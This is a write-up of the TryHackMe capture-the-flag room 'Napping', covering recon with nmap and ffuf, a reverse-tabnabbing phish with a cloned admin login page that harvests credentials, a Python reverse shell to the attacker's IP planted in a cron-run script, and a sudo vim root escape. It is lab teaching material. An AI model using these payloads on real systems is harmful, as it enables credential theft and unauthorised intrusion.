Napping - THM

This is the writeup for the TryHackMe medium difficulty room called Napping .

Task

Recon


CMD: nmap -sS -sV -p- $IP
 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-07 19:22 CEST
Nmap scan report for 10.10.167.48
Host is up (0.043s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))

The nmap scan show that there is a webserver running on port 80 and an ssh server on port 22.

Login_Page SignUp_Page

After registering a user and signing in we get access to the welcome.php page.

Welcome

On this page we can submit the URL of our blog site and an admin is going to take a look at it.

Source

The source code of the page after submiting a URL shows that we can open it using an anchor tag which has the target='_blank' attribute.
From this we can assume that the admin on the other side can open our URL the same way as we can.


 
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://$IP/admin/FUZZ.php -v
 
        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/
 
       v2.1.0-dev
________________________________________________
 
 :: Method           : GET
 :: URL              : http://10.10.167.48/admin/FUZZ.php
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
 
...
 
[Status: 200, Size: 1158, Words: 319, Lines: 39, Duration: 44ms]
| URL | http://10.10.167.48/admin/login.php
    * FUZZ: login

During the enumeration of the site we found an admin login page. So what we are going to do is to somehow make the admin give us his credentials.

Exploitation

One way of doing so is to change his website he is currently on to our malicious copy of the original admin login page.

site.html


<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Our Blog Site</title>
  </head>
  <body>
    <script>
      window.opener.location = "http://10.14.99.147/login.html";
    </script>
  </body>
</html>

The window.opener variable represents the tab which opened our site in another tab using the anchor tag with the target='_blank' attribute. By changing the URL (location) of the opener tab we can trick the admin into signing in using our malicious, crafted admin login page.


<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <title>Login</title>
    <link
      rel="stylesheet"
      href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css"
    />
    <style>
      body {
        font: 14px sans-serif;
      }
 
      .wrapper {
        width: 360px;
        padding: 20px;
      }
    </style>
  </head>
 
  <body>
    <div class="wrapper">
      <h2>Admin Login</h2>
      <p>Please fill in your credentials to login.</p>
 
      <form action="/admin/login.php" method="post">
        <div class="form-group">
          <label>Username</label>
          <input type="text" name="username" class="form-control" value="" />
          <span class="invalid-feedback"></span>
        </div>
        <div class="form-group">
          <label>Password</label>
          <input type="password" name="password" class="form-control" />
          <span class="invalid-feedback"></span>
        </div>
        <div class="form-group">
          <input type="submit" class="btn btn-primary" value="Login" />
        </div>
        <br />
      </form>
    </div>
  </body>
</html>

Now we start a python http server and launch up wireshark to to get the POST request of the admin.


CMD: python -m http.server 80

After submiting our malicious http://10.14.99.147/site.html blog and waiting a bit we get a POST request from the admin with his credentials.

Credentials

Using these credentials we can login to the machine via ssh.

Getting the User Flag


CMD: ./pspy
 
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d
 
 
     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░
                   ░           ░ ░
                               ░ ░
 
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2025/10/07 17:07:31 CMD: UID=1001  PID=67689  | ./pspy
2025/10/07 17:07:31 CMD: UID=0     PID=67666  |
...
2025/10/07 17:08:01 CMD: UID=1000  PID=67701  | /usr/bin/python3 /home/adrian/query.py
2025/10/07 17:08:01 CMD: UID=0     PID=67705  |
...
2025/10/07 17:09:01 CMD: UID=0     PID=67721  |
2025/10/07 17:09:01 CMD: UID=1000  PID=67720  | /usr/bin/python3 /home/adrian/query.py

By running the tool pspy , we see that there is a python file in adrian’s home directory which is being executed every minute.


daniel@ip-10-10-167-48:/home/adrian$ id
uid=1001(daniel) gid=1001(daniel) groups=1001(daniel),1002(administrators)
daniel@ip-10-10-167-48:/home/adrian$ ls -la
total 40
drwxr-xr-x 4 adrian adrian         4096 Oct  7 17:20 .
drwxr-xr-x 5 root   root           4096 Oct  7 14:54 ..
 
...
 
-rw------- 1 adrian adrian            0 Mar 16  2022 .viminfo
-rw-rw-r-- 1 adrian administrators  142 Oct  7 17:15 query.py
-rw-r----- 1 root   adrian           56 Mar 16  2022 user.txt

Taking a close look at the file, we find that we have write permissions for it.

query.py


import sys,socket,os,pty;
s=socket.socket();
s.connect(("10.14.99.147",9998));
[os.dup2(s.fileno(),fd) for fd in (0,1,2)];
pty.spawn("/bin/bash")


CMD: nc -lvnp 9998

After changing the contents of the python file to a reverse shell and starting a listener we get a shell back as adrian.

User_Flag

The USER FLAG is found in the home directory of adrian.

Getting the Root Flag


adrian@ip-10-10-167-48:~$ sudo -l
sudo -l
Matching Defaults entries for adrian on ip-10-10-167-48:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
 
User adrian may run the following commands on ip-10-10-167-48:
    (root) NOPASSWD: /usr/bin/vim

He also has the right to run vim as root which we can leverage to our advantage.
Let’s search it up in GTFObins .


CMD: sudo vim -c ':!/bin/sh'

Executing the command gives us a shell as root.

Root_Flag

The ROOT FLAG is in /root.